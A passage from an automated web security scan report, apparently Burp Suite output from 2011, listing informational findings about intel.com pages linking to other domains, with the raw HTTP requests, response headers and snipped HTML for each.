Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="Set-Cookie"
Content-Type: text/html;charset=utf-8
Content-Language: en
Server: IA Web Server
Date: Sat, 05 Feb 2011 23:21:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=Ck1WNNbcJjFbVrvJt6WS5Gs0tpTc29Lncf1LHR3vj4k6TgQpLTvM!-280077424; path=/; HttpOnly=
Content-Length: 105032


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

   <head
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.dell.com/us/en/home/notebooks/laptop-inspiron-10/pd.aspx?refid=laptop-inspiron-10&amp;s=dhs&amp;cs=19&amp;~oid=us~en~29~laptop-inspiron-10-new_anav1~~#&manufacturer=Dell&processor=Atom&offerSeller=Dell&model=Dell Inspiron Mini 10&prc=279.00" target="_blank"><img src="http://www.intel.com/core/shopdata/Dell_25_45558_Dell_inspiron-mini-10-(1010)_netbook.jpg" alt="Dell Inspiron Mini 10 image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://www.dell.com/us/en/home/notebooks/laptop-inspiron-10/pd.aspx?refid=laptop-inspiron-10&amp;s=dhs&amp;cs=19&amp;~oid=us~en~29~laptop-inspiron-10-new_anav1~~#&manufacturer=Dell&processor=Atom&offerSeller=Dell&model=Dell Inspiron Mini 10&prc=279.00" target="_blank"> Dell Inspiron Mini 10</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.dell.com/us/en/home/notebooks/laptop-inspiron-10/pd.aspx?refid=laptop-inspiron-10&amp;s=dhs&amp;cs=19&amp;~oid=us~en~29~laptop-inspiron-10-new_anav1~~#&manufacturer=Dell&processor=Atom&offerSeller=Dell&model=Dell Inspiron Mini 10&prc=279.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.shopping.hp.com/webapp/shopping/computer_can_series.do?storeName=computer_store&amp;category=notebooks&amp;a1=Category&amp;v1=Mini&amp;series_name=mini210_series&amp;jumpid=in_R329_prodexp/hhoslp/psg/notebooks/Mini/mini210_series#&manufacturer=HP&processor=Atom&offerSeller=HP&model=HP Mini 210&prc=279.00" target="_blank"><img src="http://www.intel.com/core/shopdata/HP_25_55963_.jpg" alt="HP Mini 210 image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://www.shopping.hp.com/webapp/shopping/computer_can_series.do?storeName=computer_store&amp;category=notebooks&amp;a1=Category&amp;v1=Mini&amp;series_name=mini210_series&amp;jumpid=in_R329_prodexp/hhoslp/psg/notebooks/Mini/mini210_series#&manufacturer=HP&processor=Atom&offerSeller=HP&model=HP Mini 210&prc=279.00" target="_blank"> HP Mini 210</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.shopping.hp.com/webapp/shopping/computer_can_series.do?storeName=computer_store&amp;category=notebooks&amp;a1=Category&amp;v1=Mini&amp;series_name=mini210_series&amp;jumpid=in_R329_prodexp/hhoslp/psg/notebooks/Mini/mini210_series#&manufacturer=HP&processor=Atom&offerSeller=HP&model=HP Mini 210&prc=279.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.costco.com/Browse/Product.aspx?Prodid=11602446&amp;whse=BC&amp;Ne=4000000&amp;eCat=BC|84|78454&amp;N=4047244&amp;Mo=1&amp;No=0&amp;Nr=P_CatalogName:BC&amp;cat=78454&amp;Ns=P_Price|1||P_SignDesc1&amp;lang=en-US&amp;Sp=C&amp;topnav=#&manufacturer=Samsung&processor=Atom&offerSeller=Costco.com&model=Samsung N150 &prc=279.99" target="_blank"><img src="http://intelfeed.ihvweb6.com/images/3_550352.jpg" alt="Samsung N150 image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://www.costco.com/Browse/Product.aspx?Prodid=11602446&amp;whse=BC&amp;Ne=4000000&amp;eCat=BC|84|78454&amp;N=4047244&amp;Mo=1&amp;No=0&amp;Nr=P_CatalogName:BC&amp;cat=78454&amp;Ns=P_Price|1||P_SignDesc1&amp;lang=en-US&amp;Sp=C&amp;topnav=#&manufacturer=Samsung&processor=Atom&offerSeller=Costco.com&model=Samsung N150 &prc=279.99" target="_blank"> Samsung N150 </a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.costco.com/Browse/Product.aspx?Prodid=11602446&amp;whse=BC&amp;Ne=4000000&amp;eCat=BC|84|78454&amp;N=4047244&amp;Mo=1&amp;No=0&amp;Nr=P_CatalogName:BC&amp;cat=78454&amp;Ns=P_Price|1||P_SignDesc1&amp;lang=en-US&amp;Sp=C&amp;topnav=#&manufacturer=Samsung&processor=Atom&offerSeller=Costco.com&model=Samsung N150 &prc=279.99" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.dell.com/us/en/home/notebooks/inspiron-1012/pd.aspx?refid=inspiron-1012&amp;s=dhs&amp;cs=19&amp;~oid=us~en~29~laptop-inspiron-10_anav_2~~#&manufacturer=Dell&processor=Atom&offerSeller=Dell&model=Dell Inspiron Mini 10&prc=299.00" target="_blank"><img src="http://www.intel.com/core/shopdata/Dell_25_81973_Dell_inspiron-mini-10-(1012)_netbook.jpg" alt="Dell Inspiron Mini 10 image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://www.dell.com/us/en/home/notebooks/inspiron-1012/pd.aspx?refid=inspiron-1012&amp;s=dhs&amp;cs=19&amp;~oid=us~en~29~laptop-inspiron-10_anav_2~~#&manufacturer=Dell&processor=Atom&offerSeller=Dell&model=Dell Inspiron Mini 10&prc=299.00" target="_blank"> Dell Inspiron Mini 10</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.dell.com/us/en/home/notebooks/inspiron-1012/pd.aspx?refid=inspiron-1012&amp;s=dhs&amp;cs=19&amp;~oid=us~en~29~laptop-inspiron-10_anav_2~~#&manufacturer=Dell&processor=Atom&offerSeller=Dell&model=Dell Inspiron Mini 10&prc=299.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.amazon.com/Asus-1001P-MU17-BK-10-1-Inch-Netbook-Computer/dp/B00322PYUY/ref=sr_1_8?ie=UTF8&amp;s=pc&amp;qid=1274130608&amp;sr=1-8#&manufacturer=ASUS&processor=Atom&offerSeller=Amazon&model=ASUS 1001P&prc=299.00" target="_blank"><img src="http://www.intel.com/core/shopdata/ASUS_25_53959_Asus_1001P-MU17_netbook.jpg" alt="ASUS 1001P image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://www.amazon.com/Asus-1001P-MU17-BK-10-1-Inch-Netbook-Computer/dp/B00322PYUY/ref=sr_1_8?ie=UTF8&amp;s=pc&amp;qid=1274130608&amp;sr=1-8#&manufacturer=ASUS&processor=Atom&offerSeller=Amazon&model=ASUS 1001P&prc=299.00" target="_blank"> ASUS 1001P</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.amazon.com/Asus-1001P-MU17-BK-10-1-Inch-Netbook-Computer/dp/B00322PYUY/ref=sr_1_8?ie=UTF8&amp;s=pc&amp;qid=1274130608&amp;sr=1-8#&manufacturer=ASUS&processor=Atom&offerSeller=Amazon&model=ASUS 1001P&prc=299.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.amazon.com/Seashell-1005PE-PU17-BK-10-1-Inch-Netbook-Battery/dp/B00322PYZO/ref=sr_1_3?ie=UTF8&amp;s=pc&amp;qid=1274130608&amp;sr=1-3#&manufacturer=ASUS&processor=Atom&offerSeller=Amazon&model=ASUS 1005PE&prc=335.00" target="_blank"><img src="http://www.intel.com/core/shopdata/ASUS_25_78241_.jpg" alt="ASUS 1005PE image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://www.amazon.com/Seashell-1005PE-PU17-BK-10-1-Inch-Netbook-Battery/dp/B00322PYZO/ref=sr_1_3?ie=UTF8&amp;s=pc&amp;qid=1274130608&amp;sr=1-3#&manufacturer=ASUS&processor=Atom&offerSeller=Amazon&model=ASUS 1005PE&prc=335.00" target="_blank"> ASUS 1005PE</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.amazon.com/Seashell-1005PE-PU17-BK-10-1-Inch-Netbook-Battery/dp/B00322PYZO/ref=sr_1_3?ie=UTF8&amp;s=pc&amp;qid=1274130608&amp;sr=1-3#&manufacturer=ASUS&processor=Atom&offerSeller=Amazon&model=ASUS 1005PE&prc=335.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://shop.lenovo.com/SEUILibrary/controller/e/web/LenovoPortal/en_US/catalog.workflow:item.detail?x=x&amp;vt=5&amp;GroupID=243&amp;Code=064733U&amp;hide_menu_area=true#&manufacturer=Lenovo&processor=Atom&offerSeller=Lenovo&model=Lenovo IdeaPad S10&prc=379.00" target="_blank"><img src="http://www.intel.com/core/shopdata/Lenovo_25_97886_Lenovo_IdeaPad-S10_netbook.jpg" alt="Lenovo IdeaPad S10 image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://shop.lenovo.com/SEUILibrary/controller/e/web/LenovoPortal/en_US/catalog.workflow:item.detail?x=x&amp;vt=5&amp;GroupID=243&amp;Code=064733U&amp;hide_menu_area=true#&manufacturer=Lenovo&processor=Atom&offerSeller=Lenovo&model=Lenovo IdeaPad S10&prc=379.00" target="_blank"> Lenovo IdeaPad S10</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://shop.lenovo.com/SEUILibrary/controller/e/web/LenovoPortal/en_US/catalog.workflow:item.detail?x=x&amp;vt=5&amp;GroupID=243&amp;Code=064733U&amp;hide_menu_area=true#&manufacturer=Lenovo&processor=Atom&offerSeller=Lenovo&model=Lenovo IdeaPad S10&prc=379.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://www.shopping.hp.com/webapp/shopping/computer_can_series.do?storeName=computer_store&amp;category=notebooks&amp;a1=Category&amp;v1=Mini&amp;series_name=mini311_series&amp;jumpid=in_R329_prodexp/hhoslp/psg/notebooks/Mini/mini311_series#&manufacturer=HP&processor=Atom&offerSeller=HP&model=HP Mini 311 Series&prc=399.00" target="_blank"><img src="http://www.intel.com/core/shopdata/HP_25_54478_HP_mini-311-series_netbook.jpg" alt="HP Mini 311 Series image" width="120" border="0" />
...[SNIP]...
<h3><a class="buy-button" href="http://www.shopping.hp.com/webapp/shopping/computer_can_series.do?storeName=computer_store&amp;category=notebooks&amp;a1=Category&amp;v1=Mini&amp;series_name=mini311_series&amp;jumpid=in_R329_prodexp/hhoslp/psg/notebooks/Mini/mini311_series#&manufacturer=HP&processor=Atom&offerSeller=HP&model=HP Mini 311 Series&prc=399.00" target="_blank"> HP Mini 311 Series</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://www.shopping.hp.com/webapp/shopping/computer_can_series.do?storeName=computer_store&amp;category=notebooks&amp;a1=Category&amp;v1=Mini&amp;series_name=mini311_series&amp;jumpid=in_R329_prodexp/hhoslp/psg/notebooks/Mini/mini311_series#&manufacturer=HP&processor=Atom&offerSeller=HP&model=HP Mini 311 Series&prc=399.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://mobility.mirusinnovations.com/configure?product=136776#&manufacturer=Mirus&processor=Atom&offerSeller=CyberPower&model=Mirus Schoolmate Clamshell 10&#034; MIRCM10GXP&prc=399.00" target="_blank"><img src="http://mobility.mirusinnovations.com/images/products/136776_590x442.png" alt="Mirus Schoolmate Clamshell 10&#034; MIRCM10GXP image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://mobility.mirusinnovations.com/configure?product=136776#&manufacturer=Mirus&processor=Atom&offerSeller=CyberPower&model=Mirus Schoolmate Clamshell 10&#034; MIRCM10GXP&prc=399.00" target="_blank"> Mirus Schoolmate Clamshell 10&#034; MIRCM10GXP</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://mobility.mirusinnovations.com/configure?product=136776#&manufacturer=Mirus&processor=Atom&offerSeller=CyberPower&model=Mirus Schoolmate Clamshell 10&#034; MIRCM10GXP&prc=399.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li class="productImage"><a class="buy-button" href="http://mobility.mirusinnovations.com/configure?product=121862#&manufacturer=Mirus&processor=Atom&offerSeller=CyberPower&model=Mirus Schoolmate Convertible 8.9&#034; MIRCT9XPV&prc=435.00" target="_blank"><img src="http://mobility.mirusinnovations.com/images/products/121862_590x442.png" alt="Mirus Schoolmate Convertible 8.9&#034; MIRCT9XPV image" width="120" border="0" /></a>
...[SNIP]...
<h3><a class="buy-button" href="http://mobility.mirusinnovations.com/configure?product=121862#&manufacturer=Mirus&processor=Atom&offerSeller=CyberPower&model=Mirus Schoolmate Convertible 8.9&#034; MIRCT9XPV&prc=435.00" target="_blank"> Mirus Schoolmate Convertible 8.9&#034; MIRCT9XPV</a>
...[SNIP]...
</ul>
                                    <a class="buy-button" href="http://mobility.mirusinnovations.com/configure?product=121862#&manufacturer=Mirus&processor=Atom&offerSeller=CyberPower&model=Mirus Schoolmate Convertible 8.9&#034; MIRCT9XPV&prc=435.00" target="_blank"> <img src="/shop/en_US/Assets/Image/backgrounds/btn-see-product.png" alt="See Product">
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.143. http://www.intel.com/siteindex.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /siteindex.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/siteindex.htm?iid=ftr+map
The response contains the following links to other domains:
  • http://www.intc.com/
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /siteindex.htm?iid=ftr+map HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35770

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<title>Intel Corporation - U.S. Site Index</title>
<meta
...[SNIP]...
<li><a href="http://www.intc.com" onclick="var s='s_gs()'; waCustomLink(this,'','e','wa_iid=siteindex+companyinfo_invest');">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.144. http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /sites/sitewide/en_US/privacy/privacy.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:17:53 GMT
Content-Length: 28251
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
   <head>
               <title>Intel&reg; Online Privacy Notice Summary</title>
       <me
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.145. http://www.intel.com/sites/sitewide/en_US/termsofuse.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /sites/sitewide/en_US/termsofuse.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:17:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60605

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<title>Intel&reg; Terms of Use</title>
<meta http-eq
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.146. http://www.intel.com/sites/sitewide/en_US/tradmarx.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /sites/sitewide/en_US/tradmarx.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
